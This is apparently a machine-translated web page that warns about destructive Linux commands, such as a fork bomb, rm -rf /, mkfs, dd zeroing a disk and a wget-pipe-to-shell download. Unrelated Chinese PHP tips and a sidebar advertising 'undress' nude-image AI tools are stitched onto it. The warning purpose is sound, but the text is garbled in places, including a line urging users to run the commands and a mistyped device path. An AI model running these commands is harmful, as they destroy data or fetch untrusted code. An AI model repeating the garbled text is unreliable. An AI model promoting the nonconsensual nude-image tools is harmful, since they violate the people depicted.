Linux shell/terminal commands are very powerful, even a simple command may cause folders, files or path folders to be deleted.
In some cases, Linux will not even ask you and directly execute the command, causing you to lose various data information.
Generally speaking, new Linux users are recommended to execute these commands on the Web. Of course, there are also people who have written this code who don’t think so, because this thing is no longer a joke once you write it down.
Here I have collected some Linux codes that are harmful to the system to help you avoid them. Remember: this code is very dangerous and can even be modified to become more harmful.
Something else to note: some commands are harmful only if they have the sudo prefix in Ubuntu. Other distributions of Linux will be harmful when used as root directory commands.
1. Linux Fork Bomb Command
:(){ :|: & };: Known as Fork Bomb, it is a denial of service attack on the Linux system. :(){ :|: & };: is a bash function. As long as it is executed, it will be repeated until the system is frozen.
You can only solve this problem by restarting the system. So be sure to pay attention when you execute this command on the Linux interface.
2. Mv Folder/Dev/Null Command
mv folder/dev/null is also a dangerous command. Dev/null or null device is a device file that deletes all data written on this device file. However, the operation prompt is that the write operation was executed successfully. This is what we often call bit bucked or black hole.
3. Rm -Rf Command
The rm -rf command can quickly delete folders and their contents in Linux systems. If you don't know how to use it correctly, you will just cry.
List the most common combinations and choices of m-rf commands:
rm command :删除Linux系统的文件 rm -f command:不需提示,删除文件中的只读文件 rm -r command 循环删除文件夹的内容 rm -d command :删除空目录,如果非空目录则不会执行该操作 rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。 rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹 rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]* The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
4. Mkfs Command
If you don’t know the function of mkfs, then it is also a dangerous command. Any command written after mkfs will be replaced by a Format and replace blank linux file systems.
The following are the commands that require administrator permissions to format the hard disk:
mkfs mkfs.ext3 mkfs.bfs mkfs.ext2 mkfs.minix mkfs.msdos mkfs.reiserfs mkfs.vfat
mkfs.cramfs can also do the same thing as the above code, but does not require administrative source permissions.
5. Tar Bomb
The tar command is used to put multiple files into one file (archive file) in .tar format. Tape Archive (Tar) bomb can be created by him.
When compressed, it is this archive file that generates tens of thousands of similarly named files that appear in the current directory instead of a new directory.
When receiving tar files, regularly create a new protected directory and then place the received tar file into this directory before unzipping, you can avoid becoming a victim of tar bomb.
6. Dd Command
Dd command is used to copy & change hard disk partitions. If you use it in the wrong place, it can be dangerous.
The dd command is listed below:
dd if=/dev/hda of=/dev/hdb dd if=/dev/hda of=/dev/sdb dd if=something of=/dev/hda dd if=something of=/dev/sda
The following command will clear the entire main hard disk: dd if=/dev/zero of=/dev/had
7. Shell Script Code
Sometimes, you may be The trap gives you a shell script file and asks you to download and execute it. The script may contain some malicious or dangerous code. The command form may be like this: wget http://some_malicious_source -O- | sh. wget will download the script when sh narrow script.
8. Malicious Source Code
Maybe someone will give you the source code and let you compile it. The code may be normal code, but there may be some malicious code disguised in the large source code. If so, your system is vulnerable. How to avoid it? Only accept and compile source code from trustworthy sources.
9. Decompression Bomb
You have received a compressed file and you have been asked to extract this seemingly small file, maybe as small as KB. In fact, the small size of the compressed file contains highly compressed data.
As long as the file is decompressed, hundreds of GB of data will be extracted. At this time, there is a high chance that the excessively large data will fill the hard drive and cause downtime. How to avoid it? As the old saying goes, don’t be cheap, accept any documents, please accept documents from trusted sources.

php把负数转为正整数的方法:1、使用abs()函数将负数转为正数,使用intval()函数对正数取整,转为正整数,语法“intval(abs($number))”;2、利用“~”位运算符将负数取反加一,语法“~$number + 1”。

实现方法:1、使用“sleep(延迟秒数)”语句,可延迟执行函数若干秒;2、使用“time_nanosleep(延迟秒数,延迟纳秒数)”语句,可延迟执行函数若干秒和纳秒;3、使用“time_sleep_until(time()+7)”语句。

php除以100保留两位小数的方法:1、利用“/”运算符进行除法运算,语法“数值 / 100”;2、使用“number_format(除法结果, 2)”或“sprintf("%.2f",除法结果)”语句进行四舍五入的处理值,并保留两位小数。

php字符串有下标。在PHP中,下标不仅可以应用于数组和对象,还可应用于字符串,利用字符串的下标和中括号“[]”可以访问指定索引位置的字符,并对该字符进行读写,语法“字符串名[下标值]”;字符串的下标值(索引值)只能是整数类型,起始值为0。

判断方法:1、使用“strtotime("年-月-日")”语句将给定的年月日转换为时间戳格式;2、用“date("z",时间戳)+1”语句计算指定时间戳是一年的第几天。date()返回的天数是从0开始计算的,因此真实天数需要在此基础上加1。

在php中,可以使用substr()函数来读取字符串后几个字符,只需要将该函数的第二个参数设置为负值,第三个参数省略即可;语法为“substr(字符串,-n)”,表示读取从字符串结尾处向前数第n个字符开始,直到字符串结尾的全部字符。

方法:1、用“str_replace(" ","其他字符",$str)”语句,可将nbsp符替换为其他字符;2、用“preg_replace("/(\s|\ \;||\xc2\xa0)/","其他字符",$str)”语句。

php判断有没有小数点的方法:1、使用“strpos(数字字符串,'.')”语法,如果返回小数点在字符串中第一次出现的位置,则有小数点;2、使用“strrpos(数字字符串,'.')”语句,如果返回小数点在字符串中最后一次出现的位置,则有。


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

Notepad++7.3.1
Easy-to-use and free code editor

MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

Dreamweaver CS6
Visual web development tools

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
